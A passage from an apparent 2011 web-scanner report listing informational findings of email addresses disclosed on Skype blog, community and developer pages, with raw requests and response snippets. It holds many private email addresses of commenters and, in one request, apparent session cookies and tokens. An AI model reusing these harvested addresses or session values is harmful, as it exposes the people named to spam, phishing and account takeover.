Email: Jstepmobile@gmail.com</p>
...[SNIP]...
<p>We requested the SDK by emailing our information and got a reply saying that we needed to Review & execute SILK Agreement (available within 1 week); then Return executed agreement to silksupport@skype.net and mail hardcopy to: Jin Kim, Skype, 2145 Hamilton Ave, San Jose, CA 95124. But so far we haven't received any agreement or any instruction to let us know where to get the agreement. Please follow up
...[SNIP]...

20.39. http://blogs.skype.com/en/2009/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/08/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2009/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:49 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 204408
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>Just wanted to add my voice. My entire company (several thousand users) may drop Skype as our standard IM platform because of the constant hassle of blocking the deluge of new contact requests from tatanya99@fuckable.cn and her thousands of friends. </p>
...[SNIP]...

20.40. http://blogs.skype.com/en/2009/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/10/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2009/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:46 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 100515
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
matt_wagoner@hotmail.com</p>
...[SNIP]...
<br />
matt_wagoner@hotmail.com</p>
...[SNIP]...

20.41. http://blogs.skype.com/en/2009/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2009/11/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2009/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:45 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 183138
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>I am really desperate ! Please, send me the link to: amansour_99@yahoo.com</p>
...[SNIP]...
<p>If anyone got more infos about that bug or a better work around please send me a notice: xuedi@beijingcode.org</p>
...[SNIP]...

20.42. http://blogs.skype.com/en/2010/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/01/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2010/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:43 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 182044
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>RT @carelpedre: Again, I did not intend to ask. I need to add credits to my skype. Please donate on my paypal: pedrecarel@gmail.com #Haiti</p>
...[SNIP]...

20.43. http://blogs.skype.com/en/2010/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/02/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2010/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:41 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 332415
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
Vishal@saphire.co.za</p>
...[SNIP]...
<br />
matt_wagoner@hotmail.com</p>
...[SNIP]...
<br />
Email: david.ponsford@skype.net</p>
...[SNIP]...
<br />
Email: peter.parkes@skype.net<br />
...[SNIP]...

20.44. http://blogs.skype.com/en/2010/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/03/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2010/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:39 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 292276
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
uggyredmonster@comcast.net</p>
...[SNIP]...
<br />
matt_wagoner@hotmail.com</p>
...[SNIP]...
<br />
matt_wagoner@hotmail.com</p>
...[SNIP]...
<br />
matt_wagoner@hotmail.com</p>
...[SNIP]...

20.45. http://blogs.skype.com/en/2010/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/04/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2010/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:38 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 249793
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
matt_wagoner@hotmail.com</p>
...[SNIP]...
<br />
matt_wagoner@hotmail.com</p>
...[SNIP]...
<br />
matt_wagoner@hotmail.com</p>
...[SNIP]...

20.46. http://blogs.skype.com/en/2010/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/07/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2010/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:33 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 585263
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<p>My e-mail is shobuprime@gmail.com and you may reach me on Facebook by looking me up on <a href="http://www.facebook.com/shobuprime" rel="nofollow">
...[SNIP]...
l 11 de julio realice una recarga xq no me salia la opcion de paybycash y ahora me dicen q el plan vence xq no se pudo hacer la recarga x favor no kiero perder el plan cualquier respuesta mi correo es sangry_1@hotmail.com</p>
...[SNIP]...

20.47. http://blogs.skype.com/en/2010/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/08/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2010/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:31 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 118021
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
nary prospectus may be obtained from Goldman, Sachs &amp; Co., Prospectus Department, 200 West Street, New York, NY 10282, via telephone: +1 866 471 2526, via facsimile: +1 212 902 9316, or by e-mail: prospectus-ny@ny.email.gs.com; from J.P. Morgan Securities Inc.; c/o Broadridge Financial Solutions, 1155 Long Island Avenue, Edgewood, New York 11717, Attn: Prospectus Department, or by telephone +1 866 803 9204; from Morgan Stan
...[SNIP]...
<a href="mailto:&#x43;&#x42;&#x4D;&#x61;&#x64;&#x64;&#x6F;&#x78;&#x40;&#x66;&#x64;&#x2E;&#x63;&#x6F;&#x6D;">CBMaddox@fd.com</a>
...[SNIP]...
<a href="mailto:&#x53;&#x4C;&#x50;&#x61;&#x72;&#x72;&#x69;&#x73;&#x68;&#x40;&#x66;&#x64;&#x2E;&#x63;&#x6F;&#x6D;">SLParrish@fd.com</a>
...[SNIP]...

20.48. http://blogs.skype.com/en/2010/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/09/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2010/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:30 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 242894
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
ain - or after the power runs out)? I have an LG Ally with Droid. I thought they would have fixed this with 1.5.0.16 posted the other week. I contacted Verzion on the phone and on e-mail as well as skypeuploader@googlemail.com about this back in October.<br />
...[SNIP]...
of those apps? I uninstall those and don't look back.. but I use Skype Mobile for work. Skype, if you can fix this please do... haven't figured out a way to enter a ticket to Skype yet.. even though skypeuploader@googlemail.com automated feedback says that I can/if there is a way.</p>
...[SNIP]...

20.49. http://blogs.skype.com/en/2010/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/10/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2010/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:29 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 485845
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
Regards, Steve sparsloe@innerpass.com</p>
...[SNIP]...

20.50. http://blogs.skype.com/en/2010/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/11/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2010/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:27 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 545285
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
E-mail: davidchan04@hotmail.com<br />
...[SNIP]...

20.51. http://blogs.skype.com/en/2010/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2010/12/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/2010/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:25 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 414773
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
groelands@zonnet.nl</p>
...[SNIP]...
<br />
Dani.Tal@cio-1.com call me for feedback. <br />
...[SNIP]...
i cannot recieve NO calls from,if i do its not clear I have a HTC Desire cell phone living in England trying to keep in touch with friends and family , what more can i do? your email addy bounce back contactus@skype.com/net HELP as i have hard it </p>
...[SNIP]...

20.52. http://blogs.skype.com/en/2011/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/05/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2011/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:47 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 202770
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</a> profile, or email skypetalks@peaceoneday.org to schedule a call over Skype.* </p>
...[SNIP]...

20.53. http://blogs.skype.com/en/2011/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/07/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2011/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:45 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 109054
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<br />
vamaequi@gmail.com</p>
...[SNIP]...

20.54. http://blogs.skype.com/en/2011/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2011/08/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/2011/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:44 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 156054
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<a href="mailto:education@skype.net"><span style="font-family:&quot;Arial&quot;,&quot;sans-serif&quot;;
mso-fareast-font-family:&quot;Times New Roman&quot;;color:#336699">education@skype.net</span>
...[SNIP]...

20.55. http://blogs.skype.com/en/corporate/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/corporate/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/corporate/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:03 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 169222
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
nary prospectus may be obtained from Goldman, Sachs &amp; Co., Prospectus Department, 200 West Street, New York, NY 10282, via telephone: +1 866 471 2526, via facsimile: +1 212 902 9316, or by e-mail: prospectus-ny@ny.email.gs.com; from J.P. Morgan Securities Inc.; c/o Broadridge Financial Solutions, 1155 Long Island Avenue, Edgewood, New York 11717, Attn: Prospectus Department, or by telephone +1 866 803 9204; from Morgan Stan
...[SNIP]...
<a href="mailto:&#x43;&#x42;&#x4D;&#x61;&#x64;&#x64;&#x6F;&#x78;&#x40;&#x66;&#x64;&#x2E;&#x63;&#x6F;&#x6D;">CBMaddox@fd.com</a>
...[SNIP]...
<a href="mailto:&#x53;&#x4C;&#x50;&#x61;&#x72;&#x72;&#x69;&#x73;&#x68;&#x40;&#x66;&#x64;&#x2E;&#x63;&#x6F;&#x6D;">SLParrish@fd.com</a>
...[SNIP]...

20.56. http://blogs.skype.com/en/education/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/education/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/education/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:04 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 70824
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<a href="mailto:education@skype.net"><span style="font-family:&quot;Arial&quot;,&quot;sans-serif&quot;;
mso-fareast-font-family:&quot;Times New Roman&quot;;color:#336699">education@skype.net</span>
...[SNIP]...

20.57. http://blogs.skype.com/en/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/mobile/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/mobile/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:13 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 264936
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<a href="mailto:ctia2006@skype.net">ctia2006@skype.net</a>
...[SNIP]...

20.58. http://blogs.skype.com/en/social_good/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/social_good/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/social_good/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:41:17 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 72500
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
<a href="mailto:education@skype.net"><span style="font-family:&quot;Arial&quot;,&quot;sans-serif&quot;;
mso-fareast-font-family:&quot;Times New Roman&quot;;color:#336699">education@skype.net</span>
...[SNIP]...

20.59. http://community.skype.com/t5/Deutsch/ct-p/de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Deutsch/ct-p/de

Issue detail

The following email address was disclosed in the response:

Request

GET /t5/Deutsch/ct-p/de HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:57 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 136928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
<wbr />t@gmail.co<wbr />
...[SNIP]...
<wbr />t@gmail.co<wbr />
...[SNIP]...

20.60. http://community.skype.com/t5/Skype-auf-dem-Computer/ct-p/de_computer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Skype-auf-dem-Computer/ct-p/de_computer

Issue detail

The following email address was disclosed in the response:

Request

GET /t5/Skype-auf-dem-Computer/ct-p/de_computer HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:58 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 123217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
<wbr />t@gmail.co<wbr />
...[SNIP]...
<wbr />t@gmail.co<wbr />
...[SNIP]...

20.61. http://community.skype.com/t5/Zahlungen-Rechnungen-Skype/bd-p/de_payment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Zahlungen-Rechnungen-Skype/bd-p/de_payment

Issue detail

The following email address was disclosed in the response:

Request

GET /t5/Zahlungen-Rechnungen-Skype/bd-p/de_payment HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:59 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 186780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
<a class="lia-link-navigation lia-tag tag tagging-weight-0 tag-2132 lia-js-data-tagUid-2132" rel="tag" id="link_162" href="/t5/tag/genemark%40ymail.com/tg-p/board-id/de_payment">genemark@ymail.com</a>
...[SNIP]...

20.62. https://developer.skype.com/javascripts/jquery/extensions/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /javascripts/jquery/extensions/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/jquery/extensions/jquery.cookie.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://developer.skype.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: developer.skype.com
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:21 GMT
Server: Apache
Last-Modified: Fri, 02 Sep 2011 10:07:56 GMT
ETag: "309a7-10b1-4abf28903b700"-gzip
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 21:07:21 GMT
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=549
X-UA-Compatible: IE=edge,chrome=1
Content-Length: 4273
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

//= require <jquery-1.2.6>
/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.p
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

20.63. https://developer.skype.com/silk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://developer.skype.com
Path:   /silk

Issue detail

The following email address was disclosed in the response:

Request

GET /silk HTTP/1.1
Host: developer.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:47 GMT
Server: Apache
ETag: "3800c70fc911ae730e84af42c23f038c"
Cache-Control: private, max-age=0, must-revalidate
